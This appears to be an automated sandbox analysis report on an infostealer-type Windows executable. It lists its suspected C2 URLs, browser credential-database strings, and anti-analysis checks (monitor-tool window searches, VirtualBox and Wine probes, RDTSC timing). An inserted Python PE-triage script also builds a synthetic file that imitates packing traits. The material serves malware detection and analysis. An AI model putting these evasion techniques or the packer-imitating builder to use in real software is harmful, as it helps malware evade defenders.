              Source: ARoqFi68Nr.exe, 00000000.00000003.1389987289.000000000567F000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1389634246.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388361189.0000000005679000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388658686.0000000005675000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
              Source: ARoqFi68Nr.exe, 00000000.00000002.1600312441.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596881692.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/K7
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/W
              Source: ARoqFi68Nr.exe, 00000000.00000003.1596842855.0000000001130000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1596961059.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388361189.0000000005679000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1600344046.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1544682245.0000000001120000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
              Source: ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiulti
              Source: ARoqFi68Nr.exe, 00000000.00000003.1596961059.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1600344046.0000000005682000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1502111690.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501331711.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1505633372.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/g
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/o
              Source: ARoqFi68Nr.exe, 00000000.00000003.1526898890.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1530600303.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/piO
              Source: ARoqFi68Nr.exe, 00000000.00000003.1544388931.0000000001151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/piw
              Source: ARoqFi68Nr.exe, 00000000.00000003.1502111690.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501331711.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1505633372.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/yW
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: ARoqFi68Nr.exe, 00000000.00000003.1478044729.0000000005798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49748 version: TLS 1.2

              System Summary

              barindex
              Source: ARoqFi68Nr.exeStatic PE information: section name:
              Source: ARoqFi68Nr.exeStatic PE information: section name: .rsrc
              Source: ARoqFi68Nr.exeStatic PE information: section name: .idata
              Source: ARoqFi68Nr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: ARoqFi68Nr.exeStatic PE information: Section: ZLIB complexity 0.9996297998366013
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363608844.00000000056AA000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1389586999.0000000005690000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1365110657.000000000568E000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1389429452.000000000569D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: ARoqFi68Nr.exeReversingLabs: Detection: 55%
              Source: ARoqFi68Nr.exeVirustotal: Detection: 52%
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile read: C:\Users\user\Desktop\ARoqFi68Nr.exe
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: apphelp.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: winmm.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: wldp.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: winhttp.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: webio.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: mswsock.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: winnsi.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: sspicli.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: schannel.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: msasn1.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: gpapi.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: amsi.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: userenv.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: profapi.dll
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: version.dll
              Source: ARoqFi68Nr.exeStatic file information: File size 2935296 > 1048576
              Source: ARoqFi68Nr.exeStatic PE information: Raw size of trvrqxmv is bigger than: 0x100000 < 0x2a2e00

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeUnpacked PE file: 0.2.ARoqFi68Nr.exe.560000.0.unpack :EW;.rsrc :W;.idata :W;trvrqxmv:EW;fllfikzu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;trvrqxmv:EW;fllfikzu:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: ARoqFi68Nr.exeStatic PE information: real checksum: 0x2cf6b0 should be: 0x2d8a06
              Source: ARoqFi68Nr.exeStatic PE information: section name:
              Source: ARoqFi68Nr.exeStatic PE information: section name: .rsrc
              Source: ARoqFi68Nr.exeStatic PE information: section name: .idata
              Source: ARoqFi68Nr.exeStatic PE information: section name: trvrqxmv
              Source: ARoqFi68Nr.exeStatic PE information: section name: fllfikzu
              Source: ARoqFi68Nr.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: ARoqFi68Nr.exeStatic PE information: section name: entropy: 7.981577934195685
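
              Added example, not part of the Joe Sandbox report and not code from the sample: a stdlib-only Python script that recomputes, on a constructed PE32 image, the static traits the System Summary and Data Obfuscation entries above are built from. It implements the PE image checksum (the "real checksum ... should be" line), per-section Shannon entropy and zlib ratio (the "entropy" and "ZLIB complexity" lines), the test for section names made of non-printable bytes, writable-plus-executable section flags (the ":EW" rights in the unpack line) and which section holds the entry point (".taggant" above). build_sample_pe assembles a synthetic file that imitates those traits, reusing the section names trvrqxmv and .taggant from the report and storing a deliberately wrong CheckSum; the offsets and constants are from the PE specification, everything else is an assumption of this example.

```python
import math
import random
import struct
import zlib
from collections import Counter

IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 when every byte value is equally frequent."""
    n = len(data)
    return 0.0 - sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def zlib_ratio(data: bytes) -> float:
    """compressed / raw size; at or above 1.0 the data is incompressible (packed or encrypted)."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def pe_checksum(image: bytes, checksum_field_offset: int) -> int:
    """imagehlp's CheckSumMappedFile algorithm: sum every dword except the CheckSum field
    with end-around carry, fold the result to 16 bits, then add the file length."""
    padded = image + b"\x00" * (-len(image) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_field_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(image)


def triage_pe(image: bytes) -> dict:
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    assert image[e_lfanew:e_lfanew + 4] == b"PE\x00\x00", "not a PE image"
    nsections, opt_size = struct.unpack_from("<H12xH", image, e_lfanew + 6)
    opt = e_lfanew + 24                               # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]
    stored = struct.unpack_from("<I", image, opt + 64)[0]   # CheckSum, same offset in PE32 and PE32+
    computed = pe_checksum(image, opt + 64)
    sections, entry_section = [], None
    for i in range(nsections):
        raw_name, vsize, va, rawsize, rawptr, _, _, _, _, chars = SECTION_HDR.unpack_from(
            image, opt + opt_size + i * SECTION_HDR.size)
        name = raw_name.rstrip(b"\x00").decode("latin-1")
        body = image[rawptr:rawptr + rawsize]
        if va <= entry_rva < va + max(vsize, rawsize):
            entry_section = name
        sections.append({
            "name": name,
            # empty, or bytes outside printable ASCII: the "section with special chars" signature
            "odd_name": not name or any(not 0x21 <= ord(ch) <= 0x7E for ch in name),
            "entropy": round(shannon_entropy(body), 3),
            "zlib_ratio": round(zlib_ratio(body), 4),
            "wx": bool(chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE),
        })
    return {"checksum_stored": stored, "checksum_computed": computed,
            "checksum_ok": stored == computed, "entry_section": entry_section, "sections": sections}


def build_sample_pe(seed: int = 7) -> bytes:
    """Constructed PE32 (not the analysed sample): a section named with non-printable bytes holding
    pseudo-random data, a W+X section with a random-looking name, entry point in .taggant, bad CheckSum."""
    rng = random.Random(seed)
    layout = [  # (name, raw bytes, IMAGE_SCN_CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE)
        (b"\x01\x01\x01\x01\x00\x00\x00\x00", bytes(rng.getrandbits(8) for _ in range(0x4000)), 0xE0000020),
        (b"trvrqxmv", b"kernel32.dll\x00LoadLibraryA\x00GetProcAddress\x00".ljust(0x200, b"\x00"), 0xE0000020),
        (b".taggant", b"\x90" * 0x200, 0xE0000020),
    ]
    e_lfanew, opt_size, file_align, sect_align = 0x40, 0xE0, 0x200, 0x1000
    table, body, rawptr, va, entry = b"", b"", 0x200, 0x1000, 0
    for name, content, chars in layout:               # every raw size above is already 0x200-aligned
        if name == b".taggant":
            entry = va + 0x10
        table += SECTION_HDR.pack(name, len(content), va, len(content), rawptr, 0, 0, 0, 0, chars)
        body, rawptr = body + content, rawptr + len(content)
        va += -(-len(content) // sect_align) * sect_align
    hdr = bytearray(0x200)                            # headers padded to the file alignment
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    # IMAGE_FILE_HEADER: i386, len(layout) sections, EXECUTABLE_IMAGE | 32BIT_MACHINE
    struct.pack_into("<HHIIIHH", hdr, e_lfanew + 4, 0x14C, len(layout), 0, 0, 0, opt_size, 0x0102)
    opt = e_lfanew + 24
    struct.pack_into("<H", hdr, opt, 0x10B)                            # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, entry)                       # AddressOfEntryPoint
    struct.pack_into("<III", hdr, opt + 28, 0x400000, sect_align, file_align)
    struct.pack_into("<II", hdr, opt + 56, va, 0x200)                  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", hdr, opt + 92, 16)                          # NumberOfRvaAndSizes
    hdr[opt + opt_size:opt + opt_size + len(table)] = table
    image = bytes(hdr) + body
    wrong = pe_checksum(image, opt + 64) ^ 0x1234     # a stored value that cannot match
    return image[:opt + 64] + struct.pack("<I", wrong) + image[opt + 68:]
```

              To run it on a real file, pass open(path, "rb").read() to triage_pe. The computed checksum skips only the CheckSum field, so a mismatch like the one above (0x2cf6b0 stored, 0x2d8a06 computed) means the bytes changed after the field was last written, which is what packing does; Windows only enforces the field for drivers and a few system images, so many benign executables also carry a stale value and it is a weak indicator on its own. Entropy close to 8.0 together with a zlib ratio near 1.0 is the stronger signal that a section holds compressed or encrypted payload rather than code.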

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: Regmonclass
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: Filemonclass
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSystem information queried: FirmwareTableInformation
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73AC5D second address: 73AC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73ADAE second address: 73ADB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73ADB2 second address: 73ADB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73ADB6 second address: 73ADBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73AEF5 second address: 73AF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9F08C2F7D6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73B041 second address: 73B04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2E4B6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73B1B2 second address: 73B1B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73B1B9 second address: 73B1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F9F08C2E4BBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73B419 second address: 73B421 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D553 second address: 5B8D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 add dword ptr [esp], 01A3DF5Ah 0x0000000e and dx, A96Ch 0x00000013 push dword ptr [ebp+122D15E9h] 0x00000019 push edx 0x0000001a pop ecx 0x0000001b call dword ptr [ebp+122D1CC7h] 0x00000021 pushad 0x00000022 cmc 0x00000023 xor eax, eax 0x00000025 jne 00007F9F08C2E4B7h 0x0000002b cmc 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 or dword ptr [ebp+122D2B4Eh], ebx 0x00000036 mov dword ptr [ebp+122D2CD6h], eax 0x0000003c jmp 00007F9F08C2E4BEh 0x00000041 mov esi, 0000003Ch 0x00000046 clc 0x00000047 add esi, dword ptr [esp+24h] 0x0000004b clc 0x0000004c lodsw 0x0000004e pushad 0x0000004f mov dword ptr [ebp+122D1C9Eh], esi 0x00000055 mov ebx, eax 0x00000057 popad 0x00000058 add eax, dword ptr [esp+24h] 0x0000005c jmp 00007F9F08C2E4C9h 0x00000061 mov ebx, dword ptr [esp+24h] 0x00000065 sub dword ptr [ebp+122D2599h], edi 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push edi 0x0000006f jmp 00007F9F08C2E4C3h 0x00000074 pop edi 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D5BA second address: 73D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D5C0 second address: 73D5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D5C5 second address: 73D5CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D5CC second address: 73D61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 537F8063h 0x0000000e mov dl, 9Ch 0x00000010 push 00000003h 0x00000012 mov esi, eax 0x00000014 mov edi, dword ptr [ebp+122D2D82h] 0x0000001a push 00000000h 0x0000001c jmp 00007F9F08C2E4C3h 0x00000021 mov edx, dword ptr [ebp+122D2C12h] 0x00000027 push 00000003h 0x00000029 mov edx, dword ptr [ebp+122D3BFBh] 0x0000002f mov dword ptr [ebp+122D2855h], esi 0x00000035 push A61D6E8Eh 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jng 00007F9F08C2E4B6h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D6C5 second address: 73D6D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D6D2 second address: 73D6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D6D8 second address: 73D6DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D6DD second address: 73D70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and ecx, dword ptr [ebp+122D2C86h] 0x00000010 push 00000000h 0x00000012 mov cl, 8Eh 0x00000014 call 00007F9F08C2E4B9h 0x00000019 push edi 0x0000001a jmp 00007F9F08C2E4BAh 0x0000001f pop edi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
